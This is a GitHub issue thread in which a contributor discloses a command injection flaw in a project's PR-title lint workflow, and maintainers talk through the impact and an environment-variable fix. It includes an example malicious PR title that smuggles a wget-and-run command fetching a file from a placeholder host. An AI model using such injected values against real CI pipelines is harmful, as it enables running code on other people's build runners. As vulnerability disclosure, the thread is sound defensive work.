### ISSUE TITLE
Code injection in CI workflow

### ISSUE THREAD

**Issue by lawndoc** [tari-project/tari#4043]
I would have submitted this privately, but I didn't see a SECURITY.md file in this repo. I also think this is partially mitigated, so it's okay to make you aware through an issue.

The [`pr_title`](https://github.com/tari-project/tari/blob/development/.github/workflows/pr_title.yml) workflow has a command injection vulnerability that allows someone to open a pull request and give it a title that will execute code on your GitHub runners. Hopefully this is at least mitigated by the setting that requires approval for workflows to run on PRs.

The issue is in the following lines:

```yaml
...
      - name: lint
        run: |
          echo "${{github.event.pull_request.title}}" | commitlint
```

By entering a PR title such as `" && wget https://example.com/malware && ./malware && echo "Title`, the workflow yaml is evaluated as:

```yaml
...
      - name: lint
        run: |
          echo "" && wget https://example.com/malware && ./malware && echo "Title" | commitlint
```

Even if you require approval to run workflows on PRs, it's still best to mitigate this security issue.

**Comment by delta1** [comment]
Nice find but fairly minimal impact. What mitigation would you suggest? 

The point about having an avenue for security disclosure is very important @mikethetike ^^

**Comment by delta1** [comment]
Found this, but haven’t read the source yet 

https://github.com/dreampulse/action-commitlint-pull-request-title

**Comment by lawndoc** [comment]
I'm not familiar with commitlint, does it need the exact PR title to lint the related commits? Or can you use an action in a previous step to sanitize the title?

The only concern I have with the action you found is that it suggests using `pull_request_target` as a trigger, but that can be dangerous because it runs in the context of _your_ repo and not the incoming fork that wants to merge. That means the workflow will have a GITHUB_TOKEN that has read/write access to the original repo. If there's a similar injection vulnerability in that action, it would be even worse haha.

I did just notice that you don't use self-hosted runners for this workflow. This is honestly less of a risk than I thought. GitHub's runners are a clean environment, and since you're using `pull_request` as the trigger it won't have access to your secrets. So the main concern here was potential system compromise. I was playing around with GitHub's new [code search](https://cs.github.com) and was mass alerting last night 😄 Probably should have looked a little closer at some of them.

So I guess my advice would be to make sure you continue to use GitHub's runner for this workflow and make sure you set your workflows to always require approval for PRs from external contributors.

**Comment by delta1** [comment]
> does it need the exact PR title to lint the related commits? 

Although the tool is generally used for commits, in this case it is used for the PR title since that becomes the commit message of the squashed merge commit. 

Do you know of a command line tool to sanitize the title string?

> I did just notice that you don't use self-hosted runners for this workflow. This is honestly less of a risk than I thought. GitHub's runners are a clean environment, and since you're using pull_request as the trigger it won't have access to your secrets. So the main concern here was potential system compromise 

Yep that's why I said it has minimal impact. It has no access to resources, and would quickly be noticed. 

> So I guess my advice would be to make sure you continue to use GitHub's runner for this workflow and make sure you set your workflows to always require approval for PRs from external contributors. 

Agreed there, thanks.

**Comment by lawndoc** [comment]
> Do you know of a command line tool to sanitize the title string?

The challenge is that you don't want the variable anywhere in the `run` section because if it's part of a command, it can be modified to end the command and inject new ones. You'd have to find or make a GitHub Action that allows you to enter the variable as an input and outputs a sanitized version. I might make an Action for that at some point.

**Comment by lawndoc** [comment]
Coming back to this cause I thought of a much better way to sanitize the input. You should make the `${{github.event.pull_request.title}}` an environment variable and then reference it using a normal bash variable. Example below:

```yaml
...
      - name: lint
        run: |
          echo "$PR_TITLE" | commitlint
        env:
          PR_TITLE: ${{github.event.pull_request.title}}
...
```

Please note that it's important to keep the double quotes around the variable on the command line or you can open yourself up to the injection of things like globbing (*).

**Comment by stringhandler** [comment]
nice one

**Comment by Cifko** [comment]
https://github.com/tari-project/tari/pull/4327
